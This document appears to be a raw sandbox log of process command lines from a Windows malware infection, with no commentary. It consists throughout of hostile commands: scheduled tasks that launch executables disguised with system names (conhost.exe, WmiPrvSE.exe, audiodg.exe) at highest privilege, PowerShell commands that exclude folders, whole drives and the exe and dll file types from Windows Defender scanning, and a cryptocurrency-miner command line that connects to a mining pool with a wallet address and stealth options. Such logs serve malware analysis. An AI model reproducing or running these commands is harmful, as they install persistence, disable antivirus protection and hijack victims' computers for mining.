schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Admin\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sddsfsdf" /sc ONLOGON /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\winNet\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\winNet\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\winNet\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Windows\Prefetch\ReadyBoot\explorer.exe'" /f
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Prefetch\ReadyBoot\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\Prefetch\ReadyBoot\explorer.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\spoolsv.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\es-ES\cmd.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\WmiPrvSE.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\sddsfsdf.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "25272683852682421217750818191465220422-9407692802057673643-1748207935997404968"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3052900611401125956-484756809-446905200-241649272-9487792602012423663809889304"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-271828083-4359111451189210716-1289684993802507662-1364957067213309067794720591"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Idle.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Prefetch\ReadyBoot\explorer.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-961920636-98148811797934006976321607617681184272034308288-170282153-1921298572"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17658125455922931561755729633-139957246824629125618701358-956132470-1241721211"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DnAvjBEOV3.bat"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\Bloxstrap.exe
C:\Users\Admin\Bloxstrap.exe
C:\winNet\wscript.exe
"C:\winNet\wscript.exe"
C:\winNet\wscript.exe.exe
"C:\winNet\wscript.exe.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\A9jUK9Ae8C.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe
"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\wscript.exe.exe
"C:\winNet\wscript.exe.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9039321941113196100-17247621085065542758533708-1634550024-1281521765-1306536162"
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10458232041309704218-977340461-1780344133-86343893013835761481943200512-1196967907"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-159992700111601998421866752664-655342536248805395706532405-415879957-1927639054"
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1868810344-2048948033666806126-43626291359636690543060264-744249752-158698289"
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "556020493-644620438739739999-66581829111512784121609637097-815839047-163052952"
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1104225558976001055-81118590965226475117268917871455293840-1939095154-500938075"
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1678502449-437097632901073378-156327449315826618-12647697901638505465-533490980"
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
